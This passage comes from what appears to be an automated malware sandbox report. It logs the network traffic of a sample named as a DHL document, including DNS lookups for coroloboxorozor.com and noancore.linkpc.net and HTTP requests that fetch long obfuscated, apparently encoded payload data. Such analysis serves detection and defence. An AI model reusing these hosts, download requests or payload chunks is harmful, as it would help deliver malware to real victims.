Feb 25, 2021 11:06:17.499079943 CET	53	57344	8.8.8.8	192.168.2.5
Feb 25, 2021 11:06:26.142319918 CET	54450	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:06:26.309751987 CET	53	54450	8.8.8.8	192.168.2.5
Feb 25, 2021 11:06:43.423315048 CET	59261	53	192.168.2.5	8.8.8.8
Feb 25, 2021 11:06:43.598798990 CET	53	59261	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 25, 2021 11:04:06.876347065 CET	192.168.2.5	8.8.8.8	0xe24a	Standard query (0)	coroloboxorozor.com	A (IP address)	IN (0x0001)
Feb 25, 2021 11:05:04.625102043 CET	192.168.2.5	8.8.8.8	0xb76c	Standard query (0)	coroloboxorozor.com	A (IP address)	IN (0x0001)
Feb 25, 2021 11:05:14.601785898 CET	192.168.2.5	8.8.8.8	0xac4d	Standard query (0)	coroloboxorozor.com	A (IP address)	IN (0x0001)
Feb 25, 2021 11:06:26.142319918 CET	192.168.2.5	8.8.8.8	0x4709	Standard query (0)	noancore.linkpc.net	A (IP address)	IN (0x0001)
Feb 25, 2021 11:06:43.423315048 CET	192.168.2.5	8.8.8.8	0xbf5c	Standard query (0)	noancore.linkpc.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 25, 2021 11:04:06.933918953 CET	8.8.8.8	192.168.2.5	0xe24a	No error (0)	coroloboxorozor.com		172.67.172.17	A (IP address)	IN (0x0001)
Feb 25, 2021 11:04:06.933918953 CET	8.8.8.8	192.168.2.5	0xe24a	No error (0)	coroloboxorozor.com		104.21.71.230	A (IP address)	IN (0x0001)
Feb 25, 2021 11:05:04.684876919 CET	8.8.8.8	192.168.2.5	0xb76c	No error (0)	coroloboxorozor.com		172.67.172.17	A (IP address)	IN (0x0001)
Feb 25, 2021 11:05:04.684876919 CET	8.8.8.8	192.168.2.5	0xb76c	No error (0)	coroloboxorozor.com		104.21.71.230	A (IP address)	IN (0x0001)
Feb 25, 2021 11:05:14.660923004 CET	8.8.8.8	192.168.2.5	0xac4d	No error (0)	coroloboxorozor.com		104.21.71.230	A (IP address)	IN (0x0001)
Feb 25, 2021 11:05:14.660923004 CET	8.8.8.8	192.168.2.5	0xac4d	No error (0)	coroloboxorozor.com		172.67.172.17	A (IP address)	IN (0x0001)
Feb 25, 2021 11:06:11.375838995 CET	8.8.8.8	192.168.2.5	0xeedf	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 11:06:26.309751987 CET	8.8.8.8	192.168.2.5	0x4709	No error (0)	noancore.linkpc.net		185.157.160.229	A (IP address)	IN (0x0001)
Feb 25, 2021 11:06:43.598798990 CET	8.8.8.8	192.168.2.5	0xbf5c	No error (0)	noancore.linkpc.net		185.157.160.229	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

coroloboxorozor.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49716	172.67.172.17	80	C:\Users\user\Desktop\DHL_document1102202068090891.exe

Timestamp	kBytes transferred	Direction	Data
Feb 25, 2021 11:04:07.070266962 CET	1369	OUT	GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Feb 25, 2021 11:04:07.162595987 CET	1371	IN	HTTP/1.1 200 OK Date: Thu, 25 Feb 2021 10:04:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=db377c0c2b0e77e2f33c1a9f12e02345a1614247447; expires=Sat, 27-Mar-21 10:04:07 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Thu, 25 Feb 2021 01:01:27 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 087a3e624400001ede762df000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tDpIlYivUN5We9fT8AnqcwltA0HbqgEBOCnWQ8%2FwKxQFMUaXdjEbcfSCVAONyYGiNMQaXBI862c8SYTV83vzVfjOURgd4jUltfAGhSfsBHN4Dzg%2F"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 627099b06e251ede-AMS alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 37 63 38 62 0d 0a 3c 70 3e 44 44 65 58 78 65 61 49 49 65 78 65 4d 65 78 65 78 65 78 65 49 65 78 65 78 65 78 65 6b 69 69 65 6b 69 69 65 78 65 78 65 61 53 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 72 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 61 6b 53 65 78 65 78 65 78 65 61 49 65 4d 61 65 61 53 72 65 61 49 65 78 65 61 53 78 65 58 65 6b 78 69 65 4d 4d 65 61 53 49 65 61 65 44 72 65 6b 78 69 65 4d 4d 65 53 49 65 61 78 49 65 61 78 69 65 61 61 69 65 4d 6b 65 61 61 6b 65 61 61 49 65 61 61 61 65 61 78 4d 65 61 61 49 65 58 44 65 61 78 58 65 4d 6b 65 58 58 65 58 44 65 61 61 78 65 61 61 78 65 61 61 61 65 61 61 72 65 4d 6b 65 58 53 65 61 78 61 65 4d 6b 65 61 61 49 65 61 61 44 65 61 61 78 65 4d 6b 65 61 78 69 65 61 61 78 65 4d 6b 65 72 53 65 44 58 65 53 4d 65 4d 6b 65 61 78 58 65 61 61 61 65 61 78 78 65 61 78 61 65 49 72 65 61 4d 65 61 4d 65 61 78 65 4d 72 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 53 78 65 72 58 65 78 65 78 65 44 72 65 61 65 4d 65 78 65 44 72 65 61 49 6b 65 49 61 65 61 53 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 6b 6b 49 65 78 65 4d 49 65 78 65 61 61 65 61 65 53 78 65 78 65 78 65 61 49 49 65 61 78 65 78 65 78 65 72 65 78 65 78 65 78 65 78 65 78 65 78 65 72 6b 65 61 Data Ascii: 7c8b<p>DDeXxeaIIexeMexexexeIexexexekiiekiiexexeaSIexexexexexexexerIexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexeakSexexexeaIeMaeaSreaIexeaSxeXekxieMMeaSIeaeDrekxieMMeSIeaxIeaxieaaieMkeaakeaaIeaaaeaxMeaaIeXDeaxXeMkeXXeXDeaaxeaaxeaaaeaareMkeXSeaxaeMkeaaIeaaDeaaxeMkeaxieaaxeMkerSeDXeSMeMkeaxXeaaaeaxxeaxaeIreaMeaMeaxeMrexexexexexexexeSxerXexexeDreaeMexeDreaIkeIaeaSxexexexexexexexexekkIexeMIexeaaeaeSxexexeaIIeaxexexerexexexexexexerkea
Feb 25, 2021 11:04:07.162636995 CET	1372	IN	Data Raw: 44 49 65 61 78 65 78 65 78 65 4d 6b 65 78 65 78 65 78 65 61 58 6b 65 61 78 65 78 65 78 65 78 65 78 65 61 6b 53 65 78 65 4d 6b 65 78 65 78 65 78 65 6b 65 78 65 78 65 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 49 65 78 65 78 65 78 65 78 65 78 Data Ascii: DIeaxexexeMkexexexeaXkeaxexexexexeakSexeMkexexexekexexeIexexexexexexexeIexexexexexexexexexeaaexexekexexexexexexekexerIeaMMexexearexexearexexexexearexexearexexexexexexearexexexexexexexexexexexekkSeaDMeaxexeSDexexexexeaXkeaxexekakeMexexexexexexe
Feb 25, 2021 11:04:07.162662983 CET	1373	IN	Data Raw: 65 78 65 78 65 78 65 6b 78 65 78 65 78 65 78 65 6b 49 65 78 65 78 65 78 65 6b 53 65 78 65 78 65 78 65 4d 72 65 78 65 78 65 78 65 6b 72 65 49 78 65 61 4d 65 78 65 78 65 72 65 49 6b 65 49 6b 65 6b 69 49 65 58 65 78 65 78 65 49 78 65 61 61 44 65 78 Data Ascii: exexexekxexexexekIexexexekSexexexeMrexexexekreIxeaMexexereIkeIkekiIeXexexeIxeaaDexexeaxeIkeMxekeIxeaMrexexeaxeIkeMSexekeIxeaMDexexeaxexeIkearreaaieaMSexexeaxeakSeIexexeIeaaieaMXexexeaxeakSeiexexeIeaaieaIxexexeaxeakSerexexeIeaaieaIaexexeaxeakSe
Feb 25, 2021 11:04:07.162688017 CET	1375	IN	Data Raw: 65 61 69 44 65 4d 44 65 4d 6b 65 49 65 78 65 78 65 78 65 4d 61 65 58 58 65 61 69 44 65 4d 44 65 6b 72 65 4d 61 65 49 58 65 61 69 44 65 4d 44 65 4d 6b 65 4d 65 78 65 78 65 78 65 4d 61 65 61 78 78 65 61 69 44 65 4d 44 65 4d 6b 65 4d 65 78 65 78 65 Data Ascii: eaiDeMDeMkeIexexexeMaeXXeaiDeMDekreMaeIXeaiDeMDeMkeMexexexeMaeaxxeaiDeMDeMkeMexexexeMaeiieaiDeMDeMkeMexexexeMaeaxkeaiDeMDeMkeMexexexeMaeISeaiDeMDekieMaeakMeaiDeMDeMkekexexexeMaeISeaiDeMDeMkekexexexeMaeikeaiDeMDeMkekexexexeMaeiDeaiDeMDeMkekexex
Feb 25, 2021 11:04:07.162710905 CET	1376	IN	Data Raw: 69 44 65 4d 44 65 4d 6b 65 61 4d 65 78 65 78 65 78 65 4d 61 65 58 58 65 61 69 44 65 4d 44 65 4d 61 65 61 4d 65 4d 61 65 61 61 44 65 61 69 44 65 4d 44 65 4d 6b 65 61 6b 65 78 65 78 65 78 65 4d 61 65 69 6b 65 61 69 44 65 4d 44 65 4d 6b 65 61 6b 65 Data Ascii: iDeMDeMkeaMexexexeMaeXXeaiDeMDeMaeaMeMaeaaDeaiDeMDeMkeakexexexeMaeikeaiDeMDeMkeakexexexeMaeISeaiDeMDeMkeakexexexeMaeireaiDeMDeMkeakexexexeMaeIXeaiDeMDeMaeakeMaeSkeaiDeMDeMkeaaexexexeMaeXDeaiDeMDeMkeaaexexexeMaeiIeaiDeMDeMkeaaexexexeMaeISeaiDeM
Feb 25, 2021 11:04:07.162734032 CET	1377	IN	Data Raw: 44 65 4d 6b 65 61 65 78 65 78 65 78 65 4d 61 65 58 58 65 61 69 44 65 4d 44 65 4d 6b 65 61 65 78 65 78 65 78 65 4d 61 65 69 44 65 61 69 44 65 4d 44 65 4d 6b 65 61 65 78 65 78 65 78 65 4d 61 65 69 69 65 61 69 44 65 4d 44 65 6b 4d 65 4d 61 65 49 53 Data Ascii: DeMkeaexexexeMaeXXeaiDeMDeMkeaexexexeMaeiDeaiDeMDeMkeaexexexeMaeiieaiDeMDekMeMaeISeaiDeMDeMkexexexexeMaeiaeaiDeMDeMkexexexexeMaeixeaiDeMDeMkexexexexeMaeiDeaiDeMDeMkexexexexeMaeikeaiDeMDekkeMaeakMeaiDeaaiekkexexeaxexekiIeakeaexeIxekSexexeaxeIxe
Feb 25, 2021 11:04:07.162798882 CET	1379	IN	Data Raw: 78 65 4d 61 65 61 78 78 65 61 69 44 65 4d 44 65 4d 6b 65 61 78 65 78 65 78 65 78 65 4d 61 65 61 78 61 65 61 69 44 65 4d 44 65 4d 6b 65 61 78 65 78 65 78 65 78 65 4d 61 65 58 44 65 61 69 44 65 4d 44 65 4d 61 65 61 78 65 4d 61 65 61 78 61 65 61 69 Data Ascii: xeMaeaxxeaiDeMDeMkeaxexexexeMaeaxaeaiDeMDeMkeaxexexexeMaeXDeaiDeMDeMaeaxeMaeaxaeaiDeMDeMkeXexexexeMaeXSeaiDeMDeMkeXexexexeMaeiDeaiDeMDeMkeXexexexeMaeireaiDeMDeMkeXexexexeMaeXXeaiDeMDeMaeXeMaeXXeaiDeMDeMkeSexexexeMaeiIeaiDeMDeMkeSexexexeMaeaxke
Feb 25, 2021 11:04:07.162825108 CET	1380	IN	Data Raw: 61 69 44 65 4d 44 65 4d 6b 65 61 78 58 65 78 65 78 65 78 65 4d 61 65 69 69 65 61 69 44 65 4d 44 65 4d 6b 65 61 78 58 65 78 65 78 65 78 65 4d 61 65 69 4d 65 61 69 44 65 4d 44 65 4d 6b 65 61 78 58 65 78 65 78 65 78 65 4d 61 65 58 53 65 61 69 44 65 Data Ascii: aiDeMDeMkeaxXexexexeMaeiieaiDeMDeMkeaxXexexexeMaeiMeaiDeMDeMkeaxXexexexeMaeXSeaiDeMDeMaeaxXeMaeaaxeaiDeMDeMkeaxSexexexeMaeaxxeaiDeMDeMkeaxSexexexeMaeiIeaiDeMDeMkeaxSexexexeMaeiIeaiDeMDeMkeaxSexexexeMaeikeaiDeMDeMaeaxSeMaeaaDeaiDeMDeMkeaxDexexe
Feb 25, 2021 11:04:07.162847042 CET	1382	IN	Data Raw: 65 4d 61 65 61 61 44 65 61 69 44 65 4d 44 65 4d 6b 65 58 53 65 78 65 78 65 78 65 4d 61 65 69 44 65 61 69 44 65 4d 44 65 4d 6b 65 58 53 65 78 65 78 65 78 65 4d 61 65 69 69 65 61 69 44 65 4d 44 65 4d 6b 65 58 53 65 78 65 78 65 78 65 4d 61 65 58 53 Data Ascii: eMaeaaDeaiDeMDeMkeXSexexexeMaeiDeaiDeMDeMkeXSexexexeMaeiieaiDeMDeMkeXSexexexeMaeXSeaiDeMDeMkeXSexexexeMaeIXeaiDeMDeMaeXSeMaeSkeaiDeMDeMkeXDexexexeMaeixeaiDeMDeMkeXDexexexeMaeXSeaiDeMDeMkeXDexexexeMaeXSeaiDeMDeMkeXDexexexeMaeikeaiDeMDeMaeXDeMae
Feb 25, 2021 11:04:07.162868977 CET	1383	IN	Data Raw: 53 44 65 78 65 78 65 78 65 4d 61 65 69 49 65 61 69 44 65 4d 44 65 4d 6b 65 53 44 65 78 65 78 65 78 65 4d 61 65 69 61 65 61 69 44 65 4d 44 65 4d 6b 65 53 44 65 78 65 78 65 78 65 4d 61 65 69 69 65 61 69 44 65 4d 44 65 4d 6b 65 53 44 65 78 65 78 65 Data Ascii: SDexexexeMaeiIeaiDeMDeMkeSDexexexeMaeiaeaiDeMDeMkeSDexexexeMaeiieaiDeMDeMkeSDexexexeMaeXDeaiDeMDeMaeSDeMaeaxaeaiDeMDeMkeSrexexexeMaeISeaiDeMDeMkeSrexexexeMaeiieaiDeMDeMkeSrexexexeMaeISeaiDeMDeMkeSrexexexeMaeireaiDeMDeMaeSreMaeaaIeaiDeMDeMkeSie
Feb 25, 2021 11:04:07.164226055 CET	1384	IN	Data Raw: 4d 44 65 4d 6b 65 44 72 65 78 65 78 65 78 65 4d 61 65 61 78 61 65 61 69 44 65 4d 44 65 4d 6b 65 44 72 65 78 65 78 65 78 65 4d 61 65 49 53 65 61 69 44 65 4d 44 65 4d 6b 65 44 72 65 78 65 78 65 78 65 4d 61 65 58 53 65 61 69 44 65 4d 44 65 4d 61 65 Data Ascii: MDeMkeDrexexexeMaeaxaeaiDeMDeMkeDrexexexeMaeISeaiDeMDeMkeDrexexexeMaeXSeaiDeMDeMaeDreMaeMIeaiDeMDeMkeDiexexexeMaeireaiDeMDeMkeDiexexexeMaeixeaiDeMDeMkeDiexexexeMaeiaeaiDeMDeMkeDiexexexeMaeIXeaiDeMDeMaeDieMaeMIeaiDeMDeMkeDIexexexeMaeiMeaiDeMDeM
Feb 25, 2021 11:04:07.669373035 CET	2436	OUT	GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1 Host: coroloboxorozor.com
Feb 25, 2021 11:04:07.749636889 CET	2437	IN	HTTP/1.1 200 OK Date: Thu, 25 Feb 2021 10:04:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=db377c0c2b0e77e2f33c1a9f12e02345a1614247447; expires=Sat, 27-Mar-21 10:04:07 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Thu, 25 Feb 2021 01:01:30 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 087a3e649c00001ede528e0000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=f1rsb9nipD282Yt%2F9MuV1ey6zJKRR3CNmdtKA4%2FyKqe5hvjE%2BxFGMhboc37oKt9cK%2BgCzc1SsV%2BDfHjRwpXoiBKczkoHvcM%2BUEa5RDdxDzkqgkvI"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 627099b42c281ede-AMS alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 39 31 33 0d 0a 3c 70 3e 6b 44 65 4d 4d 65 61 6b 78 65 61 61 72 65 61 78 72 65 69 53 65 61 49 72 65 6b 61 61 65 61 53 61 65 58 53 65 61 6b 53 65 6b 61 78 65 44 44 65 61 6b 78 65 61 78 61 65 61 69 58 65 6b 49 4d 65 72 58 65 53 53 65 61 44 4d 65 6b 6b 58 65 61 61 4d 65 61 6b 58 65 61 44 65 6b 49 53 65 61 72 72 65 61 6b 61 65 49 69 65 6b 6b 4d 65 49 44 65 6b 65 4d 49 65 6b 61 72 65 6b 6b 53 65 44 72 65 6b 61 4d 65 61 53 65 6b 69 65 61 72 72 65 78 65 61 6b 49 65 61 61 49 65 6b 69 6b 65 61 78 65 61 49 72 65 53 49 65 61 53 72 65 49 65 61 53 61 65 49 58 65 61 58 44 65 61 69 53 65 61 4d 58 65 4d 44 65 61 6b 61 65 4d 53 65 4d 6b 65 6b 6b 53 65 61 6b 4d 65 6b 78 6b 65 4d 44 65 61 49 65 61 58 61 65 6b 4d 58 65 69 6b 65 6b 4d 49 65 49 65 58 53 65 44 6b 65 72 6b 65 61 53 69 65 61 61 72 65 6b 69 61 65 72 53 65 69 78 65 6b 4d 53 65 61 6b 72 65 4d 78 65 49 53 65 6b 49 72 65 61 72 6b 65 61 69 65 61 58 53 65 61 72 78 65 61 6b 6b 65 61 44 44 65 61 6b 78 65 58 44 65 6b 61 53 65 53 69 65 72 49 65 61 69 69 65 4d 58 65 61 78 65 61 53 49 65 78 65 61 4d 58 65 69 78 65 53 6b 65 61 78 61 65 61 53 4d 65 6b 49 58 65 61 61 72 65 61 69 6b 65 6b 6b 58 65 6b 58 65 61 69 4d 65 6b 49 65 61 72 49 65 61 58 65 61 4d 4d 65 72 53 65 61 49 49 65 6b 53 65 6b 4d 53 65 6b 49 49 65 6b 49 58 65 61 44 6b 65 4d 72 65 61 4d 53 65 61 6b 53 65 6b 49 61 65 61 44 49 65 61 72 44 65 4d 49 65 Data Ascii: 913<p>kDeMMeakxeaareaxreiSeaIrekaaeaSaeXSeakSekaxeDDeakxeaxaeaiXekIMerXeSSeaDMekkXeaaMeakXeaDekISearreakaeIiekkMeIDekeMIekarekkSeDrekaMeaSekiearrexeakIeaaIekikeaxeaIreSIeaSreIeaSaeIXeaXDeaiSeaMXeMDeakaeMSeMkekkSeakMekxkeMDeaIeaXaekMXeikekMIeIeXSeDkerkeaSieaarekiaerSeixekMSeakreMxeISekIrearkeaieaXSearxeakkeaDDeakxeXDekaSeSierIeaiieMXeaxeaSIexeaMXeixeSkeaxaeaSMekIXeaareaikekkXekXeaiMekIearIeaXeaMMerSeaIIekSekMSekIIekIXeaDkeMreaMSeakSekIaeaDIearDeMIe
Feb 25, 2021 11:04:09.336656094 CET	3504	OUT	GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1 Host: coroloboxorozor.com
Feb 25, 2021 11:04:09.409914970 CET	3506	IN	HTTP/1.1 200 OK Date: Thu, 25 Feb 2021 10:04:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d94999d64ea9e0d16b96ff0b4933602ef1614247449; expires=Sat, 27-Mar-21 10:04:09 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Thu, 25 Feb 2021 01:01:31 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 087a3e6b1d00001ede6dbbb000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZX0z3WOLs3Witgs56TqDX%2BQJPUR%2B6xOlviXjFlakInx2%2FWw1qzMo123MKshw4vxc86UYC6OHvWuq0FX0459sNKubCoVqJqod5RseU5IL%2FDf7t5Xp"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 627099be9ed31ede-AMS alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 37 63 37 66 0d 0a 3c 70 3e 4d 58 65 61 72 78 65 4d 58 65 61 69 58 65 4d 58 65 61 72 69 65 4d 58 65 61 69 78 65 4d 58 65 61 72 58 65 4d 58 65 61 72 69 65 4d 58 65 61 65 61 61 65 49 58 65 78 65 49 53 65 78 65 49 53 65 78 65 69 61 65 78 65 69 61 65 78 65 78 65 49 4d 65 6b 49 53 65 61 58 53 65 61 72 65 61 58 58 65 6b 49 65 61 58 58 65 6b 61 69 65 61 58 53 65 6b 61 4d 65 61 58 53 65 6b 4d 6b 65 61 58 53 65 72 65 61 58 58 65 6b 61 65 61 58 58 65 6b 49 69 65 61 58 53 65 58 65 61 58 58 65 61 58 65 61 58 58 65 72 65 61 58 58 65 6b 65 61 58 58 65 69 65 61 58 58 65 6b 6b 53 65 61 58 53 65 61 72 65 61 58 58 65 61 69 65 61 58 58 65 6b 61 65 61 58 58 65 72 65 61 58 58 65 6b 69 65 61 58 58 65 6b 61 65 61 58 58 65 61 65 61 61 65 69 4d 65 78 65 49 53 65 78 65 69 72 65 78 65 69 6b 65 78 65 69 44 65 78 65 78 65 4d 69 65 61 61 6b 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 6b 44 65 6b 61 61 65 61 4d 78 65 6b 61 61 65 61 61 78 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 6b 58 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 78 44 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 4d 58 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 69 61 65 6b 61 61 65 61 65 61 61 65 69 4d 65 78 65 69 6b 65 78 65 49 53 65 78 65 69 6b 65 78 65 69 49 65 78 65 78 65 49 61 65 61 44 58 65 4d 44 65 6b 78 53 65 4d 44 65 61 Data Ascii: 7c7f<p>MXearxeMXeaiXeMXearieMXeaixeMXearXeMXearieMXeaeaaeIXexeISexeISexeiaexeiaexexeIMekISeaXSeareaXXekIeaXXekaieaXSekaMeaXSekMkeaXSereaXXekaeaXXekIieaXSeXeaXXeaXeaXXereaXXekeaXXeieaXXekkSeaXSeareaXXeaieaXXekaeaXXereaXXekieaXXekaeaXXeaeaaeiMexeISexeirexeikexeiDexexeMieaakekaaeaMaekaaeakDekaaeaMxekaaeaaxekaaeaIIekaaeaIaekaaeakXekaaeaMaekaaeaIiekaaeaIiekaaeaxDekaaeaMaekaaeaMXekaaeaIaekaaeaIIekaaeaiaekaaeaeaaeiMexeikexeISexeikexeiIexexeIaeaDXeMDekxSeMDea

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49727	172.67.172.17	80	C:\Users\user\Desktop\DHL_document1102202068090891.exe

Timestamp	kBytes transferred	Direction	Data
Feb 25, 2021 11:05:04.825196981 CET	3702	OUT	GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Feb 25, 2021 11:05:04.940366030 CET	3704	IN	HTTP/1.1 200 OK Date: Thu, 25 Feb 2021 10:05:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d896417aad4a9eeab7046399ba35b207c1614247504; expires=Sat, 27-Mar-21 10:05:04 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Thu, 25 Feb 2021 01:01:27 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 087a3f43de0000c781bbbc6000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FbJ7VUg2ftnWvx9%2F09XhSlLaFwax9JYF0kKx9Qz5ofbGqwGMZtzccaGmNeMoxhouExru9ZjgVEiJIYVKwFQnppOC3DsEHrADSQavC2upj9bTifPt"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62709b19694ec781-AMS alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 36 66 63 31 0d 0a 3c 70 3e 44 44 65 58 78 65 61 49 49 65 78 65 4d 65 78 65 78 65 78 65 49 65 78 65 78 65 78 65 6b 69 69 65 6b 69 69 65 78 65 78 65 61 53 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 72 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 61 6b 53 65 78 65 78 65 78 65 61 49 65 4d 61 65 61 53 72 65 61 49 65 78 65 61 53 78 65 58 65 6b 78 69 65 4d 4d 65 61 53 49 65 61 65 44 72 65 6b 78 69 65 4d 4d 65 53 49 65 61 78 49 65 61 78 69 65 61 61 69 65 4d 6b 65 61 61 6b 65 61 61 49 65 61 61 61 65 61 78 4d 65 61 61 49 65 58 44 65 61 78 58 65 4d 6b 65 58 58 65 58 44 65 61 61 78 65 61 61 78 65 61 61 61 65 61 61 72 65 4d 6b 65 58 53 65 61 78 61 65 4d 6b 65 61 61 49 65 61 61 44 65 61 61 78 65 4d 6b 65 61 78 69 65 61 61 78 65 4d 6b 65 72 53 65 44 58 65 53 4d 65 4d 6b 65 61 78 58 65 61 61 61 65 61 78 78 65 61 78 61 65 49 72 65 61 4d 65 61 4d 65 61 78 65 4d 72 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 53 78 65 72 58 65 78 65 78 65 44 72 65 61 65 4d 65 78 65 44 72 65 61 49 6b 65 49 61 65 61 53 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 6b 6b 49 65 78 65 4d 49 65 78 65 61 61 65 61 65 53 78 65 78 65 78 65 61 49 49 65 61 78 65 78 65 78 65 72 65 78 65 78 65 78 65 78 65 78 65 78 65 72 6b 65 61 44 49 Data Ascii: 6fc1<p>DDeXxeaIIexeMexexexeIexexexekiiekiiexexeaSIexexexexexexexerIexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexeakSexexexeaIeMaeaSreaIexeaSxeXekxieMMeaSIeaeDrekxieMMeSIeaxIeaxieaaieMkeaakeaaIeaaaeaxMeaaIeXDeaxXeMkeXXeXDeaaxeaaxeaaaeaareMkeXSeaxaeMkeaaIeaaDeaaxeMkeaxieaaxeMkerSeDXeSMeMkeaxXeaaaeaxxeaxaeIreaMeaMeaxeMrexexexexexexexeSxerXexexeDreaeMexeDreaIkeIaeaSxexexexexexexexexekkIexeMIexeaaeaeSxexexeaIIeaxexexerexexexexexexerkeaDI
Feb 25, 2021 11:05:04.940398932 CET	3705	IN	Data Raw: 65 61 78 65 78 65 78 65 4d 6b 65 78 65 78 65 78 65 61 58 6b 65 61 78 65 78 65 78 65 78 65 78 65 61 6b 53 65 78 65 4d 6b 65 78 65 78 65 78 65 6b 65 78 65 78 65 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 49 65 78 65 78 65 78 65 78 65 78 65 78 Data Ascii: eaxexexeMkexexexeaXkeaxexexexexeakSexeMkexexexekexexeIexexexexexexexeIexexexexexexexexexeaaexexekexexexexexexekexerIeaMMexexearexexearexexexexearexexearexexexexexexearexexexexexexexexexexexekkSeaDMeaxexeSDexexexexeaXkeaxexekakeMexexexexexexexe
Feb 25, 2021 11:05:04.940412998 CET	3706	IN	Data Raw: 65 78 65 78 65 6b 78 65 78 65 78 65 78 65 6b 49 65 78 65 78 65 78 65 6b 53 65 78 65 78 65 78 65 4d 72 65 78 65 78 65 78 65 6b 72 65 49 78 65 61 4d 65 78 65 78 65 72 65 49 6b 65 49 6b 65 6b 69 49 65 58 65 78 65 78 65 49 78 65 61 61 44 65 78 65 78 Data Ascii: exexekxexexexekIexexexekSexexexeMrexexexekreIxeaMexexereIkeIkekiIeXexexeIxeaaDexexeaxeIkeMxekeIxeaMrexexeaxeIkeMSexekeIxeaMDexexeaxexeIkearreaaieaMSexexeaxeakSeIexexeIeaaieaMXexexeaxeakSeiexexeIeaaieaIxexexeaxeakSerexexeIeaaieaIaexexeaxeakSeDe
